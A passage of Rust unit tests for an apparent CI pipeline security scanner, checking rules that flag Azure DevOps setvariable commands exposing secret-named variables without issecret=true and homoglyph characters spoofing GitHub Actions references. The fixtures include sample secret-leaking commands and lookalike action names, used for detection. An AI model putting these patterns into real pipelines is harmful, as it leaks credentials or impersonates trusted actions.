10191        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10192        assert!(
10193            findings.is_empty(),
10194            "setvariable without terraform-output signal must not fire; got: {findings:#?}"
10195        );
10196    }
10197
10198    // ── setvariable_issecret_false ──────────────────────────
10199
10200    /// Helper: create an ADO-platform graph with a single Step whose
10201    /// `META_SCRIPT_BODY` is set to the given script.
10202    fn ado_graph_with_script(script: &str) -> AuthorityGraph {
10203        let mut g = graph_with_platform("azure-devops", "ado-pipeline.yml");
10204        let mut meta = std::collections::HashMap::new();
10205        meta.insert(META_SCRIPT_BODY.into(), script.into());
10206        g.add_node_with_metadata(NodeKind::Step, "script-step", TrustZone::FirstParty, meta);
10207        g
10208    }
10209
10210    #[test]
10211    fn setvariable_issecret_false_fires_on_explicit_false() {
10212        let g = ado_graph_with_script(
10213            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=false]$(token)""###,
10214        );
10215        let findings = setvariable_issecret_false(&g);
10216        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10217        assert_eq!(findings[0].severity, Severity::High);
10218        assert_eq!(
10219            findings[0].category,
10220            FindingCategory::SetvariableIssecretFalse
10221        );
10222        assert!(findings[0].message.contains("MY_TOKEN"));
10223    }
10224
10225    #[test]
10226    fn setvariable_issecret_false_skips_issecret_true() {
10227        let g = ado_graph_with_script(
10228            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=true]$(token)""###,
10229        );
10230        let findings = setvariable_issecret_false(&g);
10231        assert!(
10232            findings.is_empty(),
10233            "issecret=true must not fire; got: {findings:#?}"
10234        );
10235    }
10236
10237    #[test]
10238    fn setvariable_issecret_false_skips_non_sensitive_name() {
10239        let g = ado_graph_with_script(
10240            r###"echo "##vso[task.setvariable variable=BUILD_NUMBER]$(rev)""###,
10241        );
10242        let findings = setvariable_issecret_false(&g);
10243        assert!(
10244            findings.is_empty(),
10245            "non-sensitive name must not fire; got: {findings:#?}"
10246        );
10247    }
10248
10249    #[test]
10250    fn setvariable_issecret_false_fires_when_flag_omitted() {
10251        let g = ado_graph_with_script(
10252            r###"echo "##vso[task.setvariable variable=DB_PASSWORD]$(db_pass)""###,
10253        );
10254        let findings = setvariable_issecret_false(&g);
10255        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10256        assert!(findings[0].message.contains("DB_PASSWORD"));
10257    }
10258
10259    #[test]
10260    fn keyvaultname_does_not_fire() {
10261        // "key" is a substring of "keyvaultname" but not a token — must not fire.
10262        let g = ado_graph_with_script(
10263            r###"echo "##vso[task.setvariable variable=KEYVAULTNAME]my-vault""###,
10264        );
10265        let findings = setvariable_issecret_false(&g);
10266        assert!(
10267            findings.is_empty(),
10268            "keyvaultname must not fire (FP regression); got: {findings:#?}"
10269        );
10270    }
10271
10272    #[test]
10273    fn storage_account_key_still_fires() {
10274        // "key" is an exact token in "STORAGE_ACCOUNT_KEY" — must still fire.
10275        let g = ado_graph_with_script(
10276            r###"echo "##vso[task.setvariable variable=STORAGE_ACCOUNT_KEY]secret""###,
10277        );
10278        let findings = setvariable_issecret_false(&g);
10279        assert_eq!(
10280            findings.len(),
10281            1,
10282            "STORAGE_ACCOUNT_KEY must fire; got: {findings:#?}"
10283        );
10284        assert!(findings[0].message.contains("STORAGE_ACCOUNT_KEY"));
10285    }
10286
10287    #[test]
10288    fn github_author_email_does_not_fire() {
10289        // "auth" is a substring of "author" but not a token — must not fire.
10290        let g = ado_graph_with_script(
10291            r###"echo "##vso[task.setvariable variable=GITHUB_AUTHOR_EMAIL]user@example.com""###,
10292        );
10293        let findings = setvariable_issecret_false(&g);
10294        assert!(
10295            findings.is_empty(),
10296            "GITHUB_AUTHOR_EMAIL must not fire (FP regression); got: {findings:#?}"
10297        );
10298    }
10299
10300    #[test]
10301    fn cert_thumbprint_still_fires() {
10302        // "cert" is an exact token in "CERT_THUMBPRINT" — must still fire.
10303        let g = ado_graph_with_script(
10304            r###"echo "##vso[task.setvariable variable=CERT_THUMBPRINT]abc123""###,
10305        );
10306        let findings = setvariable_issecret_false(&g);
10307        assert_eq!(
10308            findings.len(),
10309            1,
10310            "CERT_THUMBPRINT must fire; got: {findings:#?}"
10311        );
10312        assert!(findings[0].message.contains("CERT_THUMBPRINT"));
10313    }
10314
10315    // ── homoglyph_in_action_ref ──────────────────────────────────
10316
10317    fn gha_graph_with_action(action: &str) -> AuthorityGraph {
10318        let mut g = AuthorityGraph::new(source("ci.yml"));
10319        g.metadata
10320            .insert(META_PLATFORM.into(), "github-actions".into());
10321        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
10322        g
10323    }
10324
10325    #[test]
10326    fn pure_ascii_action_ref_not_flagged() {
10327        let g = gha_graph_with_action("actions/checkout@v4");
10328        let findings = check_homoglyph_in_action_ref(&g);
10329        assert!(
10330            findings.is_empty(),
10331            "pure ASCII action ref must not fire; got: {findings:#?}"
10332        );
10333    }
10334
10335    #[test]
10336    fn division_slash_homoglyph_flagged() {
10337        // U+2215 DIVISION SLASH instead of U+002F SOLIDUS
10338        let g = gha_graph_with_action("actions\u{2215}checkout@v4");
10339        let findings = check_homoglyph_in_action_ref(&g);
10340        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10341        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10342        assert_eq!(findings[0].severity, Severity::High);
10343        assert!(findings[0].message.contains("U+2215"));
10344    }
10345
10346    #[test]
10347    fn cyrillic_a_homoglyph_flagged() {
10348        // Cyrillic small letter a (U+0430) instead of Latin a (U+0061)
10349        let g = gha_graph_with_action("\u{0430}ctions/checkout@v4");
10350        let findings = check_homoglyph_in_action_ref(&g);
10351        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10352        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10353        assert!(findings[0].message.contains("U+0430"));
10354    }
10355
10356    #[test]
10357    fn homoglyph_rule_skips_non_gha_platform() {
10358        let mut g = AuthorityGraph::new(source("ado.yml"));
10359        g.metadata
10360            .insert(META_PLATFORM.into(), "azure-devops".into());
10361        g.add_node(
10362            NodeKind::Image,
10363            "\u{0430}ctions/checkout@v4",
10364            TrustZone::ThirdParty,
10365        );
10366        let findings = check_homoglyph_in_action_ref(&g);
10367        assert!(
10368            findings.is_empty(),
10369            "non-GHA platform must not fire; got: {findings:#?}"
10370        );
10371    }
10372}